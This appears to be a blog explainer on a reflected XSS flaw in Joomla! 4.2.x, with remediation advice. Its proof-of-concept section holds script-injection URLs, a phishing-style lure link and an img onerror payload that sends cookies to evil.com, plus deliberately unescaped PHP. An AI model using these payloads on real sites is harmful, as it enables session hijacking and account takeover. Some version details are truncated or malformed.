CVE-2022-27913 - How a Simple Input Error Put Joomla! Sites at Risk (Full Exploit Details Inside)

Discovered in Joomla! versions 4.2. through 4.2.3, CVE-2022-27913 is a reflected cross-site scripting (XSS) vulnerability that could allow attackers to run malicious code directly in a victim’s browser. This post explains the issue in plain language, walks through a proof-of-concept (PoC) exploit, and gives tips for protection.

What Is CVE-2022-27913?

CVE-2022-27913 exists because Joomla! did not sufficiently filter user-provided inputs in several components. In simple terms, if an attacker could trick someone into clicking a specially-crafted link, JavaScript code could get executed in their browser. This could lead to stolen session cookies, account takeover, and more.

Joomla! 4.2.3

If you run one of these, your site could be affected.

How Does The Attack Work?

Reflective XSS happens when input from a user—like something in the URL—gets put into the page's response without being properly “sanitized” (i.e., checked and cleaned).

Let’s say you have a search field. If the value you type in the search shows up unfiltered in the page output, an attacker could inject JavaScript like <script>alert('xss')</script> and it would run.

One vulnerable point found was in URLs like this

https://example.com/index.php?option=com_content&view=article&id=42&search="><script>alert(document.domain)</script>;

On affected Joomla! sites, the value in search was directly reflected into the HTML with no proper escaping. Anyone who clicked that link (or even just visited a page with a malicious image or form) could unintentionally trigger the attacker’s script.

Let's see a simple PoC. Here’s how an attacker might craft their payload

<a href="https://victimsite.com/index.php?option=com_content&view=article&id=42&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E">;
   Click here for a prize!
</a>

When a logged-in Joomla! admin clicked this link, their session cookie could be revealed

Decoded payload:  
"><script>alert(document.cookie)</script>

Once clicked, this triggers a browser popup showing the admin’s cookies (or could send cookies to an attacker’s server).

Attackers could also try to steal the user’s session directly

<img src="x" onerror="fetch('https://evil.com/?cookie='+document.cookie)">

Which, when properly URL-encoded for this attack, would look like

https://victimsite.com/index.php?search=%22%3E%3Cimg%20src%3Dx%20onerror%3D%22fetch('https%3A%2F%2Fevil.com%2F%3Fcookie%3D'%2Bdocument.cookie)%22%3E

Impact: Stealing of cookies, session hijacking, defacement, phishing

The problem stemmed from inadequate use of Joomla's built-in input filtering. Functions like $this->escape() or JHtml::_('string.escape', $var) were either not used or not used properly.

Sample Vulnerable PHP Code

// Vulnerable: outputs user input directly
echo $_GET['search'];

Secure Version

echo htmlspecialchars($_GET['search'], ENT_QUOTES, 'UTF-8');

1. Update Immediately

Joomla! fixed this in version 4.2.4. Get the latest version here.

2. Check Your Templates

Custom templates sometimes output variables without escaping. Search for any direct use of PHP output like:

echo $_GET['param'];

And replace with

echo htmlspecialchars($_GET['param'], ENT_QUOTES, 'UTF-8');

3. Use a Web Application Firewall (WAF)

A WAF like Cloudflare or ModSecurity can block many common XSS attacks.

References and More Info

- Joomla! Security Advisory JSA-2022-0007
- NVD Entry for CVE-2022-27913
- OWASP: Cross-Site Scripting (XSS)

In Summary

CVE-2022-27913 is a reminder that web application security hinges on careful input validation and output escaping. If you run Joomla!, fix by upgrading now, double-check your templates and components, and always sanitize user input!  

If you have questions or want to discuss more Joomla! security topics, drop a comment below.

Timeline

Published on: 10/25/2022 19:15:00 UTC
Last modified on: 10/27/2022 18:48:00 UTC